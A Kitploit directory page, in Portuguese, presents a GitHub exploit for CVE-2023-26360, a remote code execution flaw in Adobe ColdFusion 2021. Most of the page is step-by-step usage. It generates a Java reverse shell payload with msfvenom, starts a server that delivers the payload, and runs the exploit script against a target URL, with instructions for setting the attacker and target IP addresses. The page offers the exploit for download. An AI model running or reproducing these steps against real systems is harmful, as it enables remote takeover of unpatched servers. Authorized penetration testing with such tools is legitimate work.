Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-26360-RCE — Exploit para Execução Remota de Código em ColdFusion 2021 (CVE-2023-26360) | Kitploit
Ferramentas/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Exploit para Execução Remota de Código em ColdFusion 2021 (CVE-2023-26360)

Ver Repositório
113há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-26360 - Execução Remota de Código no ColdFusion 2021

Às vezes, os scripts não funcionam na primeira tentativa. Tente algumas vezes para funcionar

Como executar

Criar um payload com msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Iniciando server.py

  • Este servidor enviará o payload para o servidor Coldfusion após o acesso inicial com cve.2023-26360.py, portanto precisa ser iniciado primeiro.
root@kitploit:~
python3 server.py 8000
  • O argumento 8000 é a porta na qual o servidor irá escutar.

  • É importante notar que a linha 12 configura o endereço IP do servidor, então altere-o:

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    Executar cve-2023-26360.py

    • Para executar o exploit, execute:
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • Assim como em server.py, o argumento 8000 é a porta na qual o server.py irá escutar. Portanto, deve ser o mesmo em ambos os comandos.

    • A linha 8 do cve-2023-26360.py define o endereço IP do server.py que irá escutar. É necessário configurá-lo corretamente.

    • A linha 11 do cve-2023-26360.py define o endereço IP do servidor Coldfusion, então altere-o:

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    Testado em

    • ColdFusion 2021 - Windows Server 2019
    Baixar ferramenta